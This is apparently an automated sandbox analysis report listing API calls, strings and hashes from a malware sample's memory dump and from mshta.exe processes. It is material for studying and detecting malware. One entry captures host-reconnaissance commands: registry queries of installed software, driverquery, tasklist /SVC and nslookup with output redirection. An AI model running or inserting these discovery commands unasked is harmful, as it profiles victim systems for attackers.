Opcode ID: 4b33f1e5040bbdd63dea2ab3430db7cd56a1b84c5faf24d95478d84c5085a4b1
Instruction ID: c49de1b329fb80d6c48d16d451105229bcec1914d7a9636958479b74f76a0dbd
Opcode Fuzzy Hash: 4b33f1e5040bbdd63dea2ab3430db7cd56a1b84c5faf24d95478d84c5085a4b1
Instruction Fuzzy Hash: A6F081B0345212AFE3246B79AC88B6A766CDB46375F140635F516C22D1CB644C09DA65

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5195, Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C94B29: lstrlen.KERNEL32(00000000,00000000,00000000,00C9F1E8,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 00C94B2E
Part of subcall function 00C94B29: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00C94B43
Part of subcall function 00C94B29: wsprintfA.USER32 ref: 00C94B58
Part of subcall function 00C94B29: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00C94B74

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA51B9
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA51C8
CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA51D1
GetLastError.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00CA51D9

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: f3e5a9aba823fa5ac30fa75c54b20ba654e5c3f25632747c34a23c7a29f7b377
Instruction ID: e9e2e5d810c376c4035b0474f775ee55e73caaaa4f2344a6a716328a93457027
Opcode Fuzzy Hash: f3e5a9aba823fa5ac30fa75c54b20ba654e5c3f25632747c34a23c7a29f7b377
Instruction Fuzzy Hash: 48F0E2313406117AF22037B4AC8EF7F116CDB46759F244619F712A10D1DE940D0CA161

Uniqueness

Uniqueness Score: -1.00%

Function 00C9F454, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 00C9F466

Part of subcall function 00CA4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,00CA1ED8), ref: 00CA4282
Part of subcall function 00CA4241: GetLastError.KERNEL32 ref: 00CA428C
Part of subcall function 00CA4241: WaitForSingleObject.KERNEL32(000000C8), ref: 00CA42B1
Part of subcall function 00CA4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 00CA42D2
Part of subcall function 00CA4241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 00CA42FA
Part of subcall function 00CA4241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 00CA430F
Part of subcall function 00CA4241: SetEndOfFile.KERNEL32(00000006), ref: 00CA431C
Part of subcall function 00CA4241: CloseHandle.KERNEL32(00000006), ref: 00CA4334

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,00C9A1BE,.dll,?,00001000,?,?,?), ref: 00C9F489
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00C9A1BE,.dll,?,00001000,?,?,?), ref: 00C9F4AB
GetLastError.KERNEL32(?,00C9A1BE,.dll,?,00001000,?,?,?), ref: 00C9F4BF

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
String ID:
API String ID: 3370347312-0
Opcode ID: 31d5c6be5d329bd56a08ea9e9c8a9f47f65b30b18d2b818fdecc252602508669
Instruction ID: 0f188c64e60188bc0a54875ade087c63c6f8c0c18ad8fde108fd6485ce04eb3d
Opcode Fuzzy Hash: 31d5c6be5d329bd56a08ea9e9c8a9f47f65b30b18d2b818fdecc252602508669
Instruction Fuzzy Hash: 2FF0AF32244204BBDF152FA0AC0EF9E3E29AF05750F104628F61AE51E0DB719566DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7854, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,00C9F7B7,004F0053,00000000), ref: 00CA7860
memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,00C9F7B7,004F0053,00000000), ref: 00CA7888
memset.NTDLL ref: 00CA789A

Strings

System, xrefs: 00CA785A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpymemset
String ID: System
API String ID: 4042389641-3470857405
Opcode ID: 1b5603bb96a1f0bdd63ef545a4f7d1c6b2cbc4e58e23e3fdbc1ad616b7e594f5
Instruction ID: 30c135365d8a412b4c45e20f345c045b1f1c5b875acb746f05d1a1f97314e88f
Opcode Fuzzy Hash: 1b5603bb96a1f0bdd63ef545a4f7d1c6b2cbc4e58e23e3fdbc1ad616b7e594f5
Instruction Fuzzy Hash: 4EF0E977901308BBD7206BA99C89D9F3AECDBD5398B150525F91693201F974EE00D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CACEB4, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000012B,00C993AD,000000FF,07D18900,?,?,00C9815D,0000012B,07D18900), ref: 00CACED0
GetLastError.KERNEL32(?,?,00C9815D,0000012B,07D18900,?,?,00CA79A9,00000000,?), ref: 00CACEDB
WaitNamedPipeA.KERNEL32(00002710), ref: 00CACEFD
WaitForSingleObject.KERNEL32(00000000,?,?,00C9815D,0000012B,07D18900,?,?,00CA79A9,00000000,?), ref: 00CACF0B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
String ID:
API String ID: 4211439915-0
Opcode ID: a330a95f5ec6f79dd2b09f97027b6ae7b5db7a108c5de64a6b3569a8fc3099d8
Instruction ID: 05952004a5b1de03463902b3cd4202f117406a672a066a51bd3401aa6fbb8b10
Opcode Fuzzy Hash: a330a95f5ec6f79dd2b09f97027b6ae7b5db7a108c5de64a6b3569a8fc3099d8
Instruction Fuzzy Hash: 89F09032645221AFD7302BA9FC8CB9E7E2AEB057B5F114721FA1AE61F0C6714C49D790

Uniqueness

Uniqueness Score: -1.00%

Function 00C9675E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00C91CDF,00000000,00000000,?,?,00000000,?,?,?,00C91CDF,TorClient), ref: 00CA6765
Part of subcall function 00CA672D: RtlAllocateHeap.NTDLL(00000000,00C91CDF), ref: 00CA6779
Part of subcall function 00CA672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA6793
Part of subcall function 00CA672D: RegCloseKey.KERNELBASE(?,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67BD

memcpy.NTDLL(00CBD06C,?,00000028,00000000,Client,?,?,?,?,?,00CB58E7,?,?,?,?,00C920D2), ref: 00C96790
HeapFree.KERNEL32(00000000,?,Client,?,?,?,?,?,00CB58E7,?,?,?,?,00C920D2,?), ref: 00C967C1

Strings

Client, xrefs: 00C9676B
(, xrefs: 00C96779

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: ($Client
API String ID: 1301464996-90774469
Opcode ID: 974c40ea5a71aaed06fe5778c75e9fba4ed48d8f6191ea2612016c09501c04cf
Instruction ID: a83fe61a9330e9e7e716151a2e58c811241c79629405c43c95146492fa75d6df
Opcode Fuzzy Hash: 974c40ea5a71aaed06fe5778c75e9fba4ed48d8f6191ea2612016c09501c04cf
Instruction Fuzzy Hash: 5AF04476940204FBDF21AFE0ED4AF9D7B6CA705748F100215F502621D0E6B05A45DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00CA046A, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00CA0489

Part of subcall function 00CAB674: RtlEnterCriticalSection.NTDLL(00000000), ref: 00CAB680
Part of subcall function 00CAB674: CloseHandle.KERNEL32(?), ref: 00CAB68E
Part of subcall function 00CAB674: RtlLeaveCriticalSection.NTDLL(00000000), ref: 00CAB6AA

CloseHandle.KERNEL32(?), ref: 00CA0497
InterlockedDecrement.KERNEL32(00CBDF5C), ref: 00CA04A6

Part of subcall function 00CB25A3: SetEvent.KERNEL32(000003EC,00CA04C1), ref: 00CB25AD
Part of subcall function 00CB25A3: CloseHandle.KERNEL32(000003EC), ref: 00CB25C2
Part of subcall function 00CB25A3: HeapDestroy.KERNEL32(07920000), ref: 00CB25D2

RtlExitUserThread.NTDLL(00000000), ref: 00CA04C2

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
String ID:
API String ID: 1141245775-0
Opcode ID: 395009ce3424febe84281c29f732fc588b7e53ae7a5a95e58d55284ae2aea0b7
Instruction ID: 831e5cee4791d10e7e8d242ad29c8726624a25403381ce9003d29c9423c7ce71
Opcode Fuzzy Hash: 395009ce3424febe84281c29f732fc588b7e53ae7a5a95e58d55284ae2aea0b7
Instruction Fuzzy Hash: EBF0AF71641200ABCB416B68EC0ABAD3B7CEB46B71F200318F629932D0DFB49D05DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CA84CA, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(07D18D20), ref: 00CA84D3
Sleep.KERNEL32(0000000A,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CA84DD
HeapFree.KERNEL32(00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CA8505
RtlLeaveCriticalSection.NTDLL(07D18D20), ref: 00CA8523

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: de9da1057b52f9ebd6ab4afe63cde459cd6451fcc7cb33c7ea3850449d0ede9c
Instruction ID: 5bcc89ae79f1d5adf57cfebf141af5faaf4d670273008b47c9774cf8e5b1ffbf
Opcode Fuzzy Hash: de9da1057b52f9ebd6ab4afe63cde459cd6451fcc7cb33c7ea3850449d0ede9c
Instruction Fuzzy Hash: A4F05E706002429FE720AB68ED88F9E37A8EB01784F148505F503D62A1CA30DD08CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00C991C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

Email, xrefs: 00C99217, 00C99224

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: Email
API String ID: 1279760036-642995056
Opcode ID: 8441a6dceab68faddb11006f80c4c8a0ecd5a506973a5a0db57dcb23b70338d3
Instruction ID: 7a31793a06fd45d17759ec89d005263b664bd5723fcdcc51e55e0dadf2d04a7a
Opcode Fuzzy Hash: 8441a6dceab68faddb11006f80c4c8a0ecd5a506973a5a0db57dcb23b70338d3
Instruction Fuzzy Hash: C931A8B1108209BFDF129F55DC88E6FBFADFB84398F10092DF99690021D7318A54EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C99A6E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,00CA1EE3,00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 00C99A8C
wsprintfA.USER32 ref: 00C99AAA

Strings

%02u:%02u:%02u , xrefs: 00C99AA4

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: SystemTimewsprintf
String ID: %02u:%02u:%02u
API String ID: 425189169-982595855
Opcode ID: 532433560cb6dec49ec4c223c2cfbc02922cbc71ade88626d443cff78c8aac89
Instruction ID: 09e0df2e5b33086d30f4ac42f923b48be145ae818a34ede67459292ae8092338
Opcode Fuzzy Hash: 532433560cb6dec49ec4c223c2cfbc02922cbc71ade88626d443cff78c8aac89
Instruction Fuzzy Hash: 8621D875A00204AFCB14EF95EC49FAB77BCFB89B01F004969F912DB251DAB4A901DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CA80EE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?), ref: 00CA8132
StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 00CA8144

Strings

0x, xrefs: 00CA812C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID: 0x
API String ID: 3510742995-3225541890
Opcode ID: 99af15f9e057f24ea67270f21e6056ea5a89ad680ea638cd5fd7aa004ca85fe0
Instruction ID: f9a8d8977c830149b2aee2bc05ffe107096ece1ed071e2148ec473a858a110a7
Opcode Fuzzy Hash: 99af15f9e057f24ea67270f21e6056ea5a89ad680ea638cd5fd7aa004ca85fe0
Instruction Fuzzy Hash: 5101843590020ABBDB01DFA8DC45AEFBBB9EF45744F000425EA14E7250EB70EB09C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA0DCC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32( Fw,00000000,00000000,00000000,77E34620,00000000,00C95FE6,%userprofile%\AppData\Local\,?,00000000,00C923FE), ref: 00CA0DDD

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00C923FE), ref: 00CA0DFA

Part of subcall function 00CA4FB0: RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

Strings

Fw, xrefs: 00CA0DD9

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: EnvironmentExpandHeapStrings$AllocateFree
String ID: Fw
API String ID: 1564683301-3200898389
Opcode ID: 05f9490b87df84890f81643cbc703e913bbbeb057659013a182390b963329d27
Instruction ID: a5f094a9804bce2e370f4467999a669d38be16882cfa02212146e453273d25bc
Opcode Fuzzy Hash: 05f9490b87df84890f81643cbc703e913bbbeb057659013a182390b963329d27
Instruction Fuzzy Hash: 59E0D8335025336646315AAE9C44C8FDE9CDFA37E57110531F994D3120DB20CD01E6F0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB0BC5, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CB0C23
CloseHandle.KERNEL32(?,?,00000010,?,00000000,00000000,00C945A1,00000000), ref: 00CB0C6E
HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,00CAA4DB,00000000,00C945A1,00C923B1,00000000,00C945A1,00CB2B6B,00000000,00C945A1,00CB23B3,00000000), ref: 00CB0F6A
GetLastError.KERNEL32(?,00000000,?), ref: 00CB118C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: 104dc2b0acc422f2e5bb4b808f594002ea05e04223fe13d15a0819fab885f621
Instruction ID: 41cd00d393866e6b9cbccb4e2fe7839d6e7c655527d2699aa90ce5c8077ad75e
Opcode Fuzzy Hash: 104dc2b0acc422f2e5bb4b808f594002ea05e04223fe13d15a0819fab885f621
Instruction Fuzzy Hash: 52412635604209BEDF216F69DC56FFF3A2DEB42741F684122FE51A1091CB708E11BA72

Uniqueness

Uniqueness Score: -1.00%

Function 00C91684, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA118D: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00C916BA,?,?,?,?), ref: 00CA11B1
Part of subcall function 00CA118D: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00CA11C3
Part of subcall function 00CA118D: wcstombs.NTDLL ref: 00CA11D1
Part of subcall function 00CA118D: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,00C916BA,?,?,?), ref: 00CA11F5
Part of subcall function 00CA118D: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00CA120A
Part of subcall function 00CA118D: mbstowcs.NTDLL ref: 00CA1217
Part of subcall function 00CA118D: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00C916BA,?,?,?,?,?), ref: 00CA1229
Part of subcall function 00CA118D: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00C916BA,?,?,?,?,?), ref: 00CA1243

GetLastError.KERNEL32 ref: 00C91723

Part of subcall function 00C918E3: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C9199D
Part of subcall function 00C918E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C919BD
Part of subcall function 00C918E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C919C9

HeapFree.KERNEL32(00000000,?), ref: 00C9173F
HeapFree.KERNEL32(00000000,?), ref: 00C91750
SetLastError.KERNEL32(00000000), ref: 00C91753

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: c56d7d1337c1b82ec57e806f5ae05171eaf0753006b7ef46eccc99bbe95a739c
Instruction ID: 35d9f9e2f3584ef89f32c963b61084c98a169c56e4abf961b2fe169f1e9a05f2
Opcode Fuzzy Hash: c56d7d1337c1b82ec57e806f5ae05171eaf0753006b7ef46eccc99bbe95a739c
Instruction Fuzzy Hash: 4431273590010AEFCF02AF99DC499DEBFB9EF44350F184556F926A2160C7318E61EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4FC5, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9C550: lstrlen.KERNEL32(00000000,?,?,00000000,77E34620,?,00000001,00000001,?,00CA11EE,?,?,?,?,?,00000000), ref: 00C9C5A9
Part of subcall function 00C9C550: lstrlen.KERNEL32(?,?,?,00000000,77E34620,?,00000001,00000001,?,00CA11EE,?,?,?,?,?,00000000), ref: 00C9C5C7
Part of subcall function 00C9C550: RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 00C9C5F0
Part of subcall function 00C9C550: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,00CA11EE,?,?,?,?,?,00000000), ref: 00C9C607
Part of subcall function 00C9C550: HeapFree.KERNEL32(00000000,00000000), ref: 00C9C61A
Part of subcall function 00C9C550: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,00CA11EE,?,?,?,?,?,00000000), ref: 00C9C629

GetLastError.KERNEL32 ref: 00CA5064

Part of subcall function 00C918E3: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C9199D
Part of subcall function 00C918E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C919BD
Part of subcall function 00C918E3: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00C919C9

HeapFree.KERNEL32(00000000,?), ref: 00CA5080
HeapFree.KERNEL32(00000000,?), ref: 00CA5091
SetLastError.KERNEL32(00000000), ref: 00CA5094

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: 3b5a82f0d5a42673967457b39b19d2d787f42138adbcf1eaa29e0a923cd14b74
Instruction ID: c38b0c20191c6d8aee9631c0fec967a709213d420b192b0af511edc0f4540f9f
Opcode Fuzzy Hash: 3b5a82f0d5a42673967457b39b19d2d787f42138adbcf1eaa29e0a923cd14b74
Instruction Fuzzy Hash: 9A314631800109EFCF12AF99DC449DEBF79FB49314B008166F926A2161C7318A50EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CAF57B, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CAF5C6
memset.NTDLL ref: 00CAF5DD
memset.NTDLL ref: 00CAF5F4
memset.NTDLL ref: 00CAF60C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8f1762dda1b3bf4bcbea1ec1b2c9b5dc9a2f69143ca91a2a2815224c9606c488
Instruction ID: b55acde875dade76a01e392299184ed6d2dd7750406313a744a9c5023649806e
Opcode Fuzzy Hash: 8f1762dda1b3bf4bcbea1ec1b2c9b5dc9a2f69143ca91a2a2815224c9606c488
Instruction Fuzzy Hash: E221C37260090BBBCB205F90EC81966BB39FF0A309B44012DF94586D61D772F9B6DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00C97D07, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00C98663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00CA1117), ref: 00C97D13

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

Part of subcall function 00CB64DE: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,00C97D41,00000000,00000001,00000001,?,?,00C98663,00000000,00000000,00000000,00000008,0000EA60), ref: 00CB64EC
Part of subcall function 00CB64DE: StrChrA.SHLWAPI(00000000,0000003F,?,?,00C98663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00CA1117,00000008,?), ref: 00CB64F6

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C98663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 00C97D71
lstrcpy.KERNEL32(00000000,00000000), ref: 00C97D81
lstrcpy.KERNEL32(00000000,00000000), ref: 00C97D8D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 447dc577546d4a032b155bb29009ee47693e77f06f4093da8dcc96c20750228a
Instruction ID: 36655d02892bb204b9014a8d70559d91aad193b0f4eca19243c8d4d397331af5
Opcode Fuzzy Hash: 447dc577546d4a032b155bb29009ee47693e77f06f4093da8dcc96c20750228a
Instruction Fuzzy Hash: BC21B472509215EFCF126F65DC88FAE7FA8AF56780F148155F8059B212D734DE04DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C98E40, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C98E74
memset.NTDLL ref: 00C98E8B
memset.NTDLL ref: 00C98EA2
memset.NTDLL ref: 00C98EBA

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8e1e96f9083b6ae4b77af645ff5ceb7a5e9aab250dc59b110d2646d02a46ea1c
Instruction ID: d46ed10eafbcbd2f18ebbf02f7980640b377ee938bc0470d03713d2fa423a5f8
Opcode Fuzzy Hash: 8e1e96f9083b6ae4b77af645ff5ceb7a5e9aab250dc59b110d2646d02a46ea1c
Instruction Fuzzy Hash: D911A376600909BBCB105F91EC45A677778FF0A305B440118F94457811DB72FAB9DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA587, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,747C81D0,00CB4BD7,612E002F,00000000), ref: 00CAA593
lstrlen.KERNEL32(?), ref: 00CAA59B

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

lstrcpy.KERNEL32(00000000,?), ref: 00CAA5B2
lstrcat.KERNEL32(00000000,?), ref: 00CAA5BD

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: d006a30cf12c7958484c08ec8df4169d79dc03fd065b74a9ca6445870c1f1507
Instruction ID: 41bb491c902385e0f4b0f3235867539b57f39e8ed0d9aa2ec47ac1d1cb3384ae
Opcode Fuzzy Hash: d006a30cf12c7958484c08ec8df4169d79dc03fd065b74a9ca6445870c1f1507
Instruction Fuzzy Hash: 9BE01A33805621AB8B126FA4FC08D8FBBADEF893A0B054916F55493124CB31C919DBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 3540 Parent PID: 3440 mshta.exeCOMMON

Executed Functions

Function 000001BAEBC20FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.554756107.000001BAEBC20000.00000010.00000001.sdmp, Offset: 000001BAEBC20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 5ea50b8d913b156fc2f10204a379512f6ae4890a48812f52a727e6753dd6ccaa
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 629002184D980755D41411950C8969C604067CC250FD444814416D0544D64D42965163

Uniqueness

Uniqueness Score: -1.00%

Function 000001BAEBC20FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.554756107.000001BAEBC20000.00000010.00000001.sdmp, Offset: 000001BAEBC20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 5ea50b8d913b156fc2f10204a379512f6ae4890a48812f52a727e6753dd6ccaa
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 629002184D980755D41411950C8969C604067CC250FD444814416D0544D64D42965163

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: mshta.exe PID: 1864 Parent PID: 3440 mshta.exeCOMMON

Executed Functions

Function 000001DA1B0E0FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000003.561176592.000001DA1B0E0000.00000010.00000001.sdmp, Offset: 000001DA1B0E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 60c6eb634d9ae9ad8427663c0dd28040681f0022e7685ed6e3a404e00b11a04c
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: C69004144D540755D414D1D11C477DC504077CD350FD44CC1C417D4544F44D03F71153

Uniqueness

Uniqueness Score: -1.00%

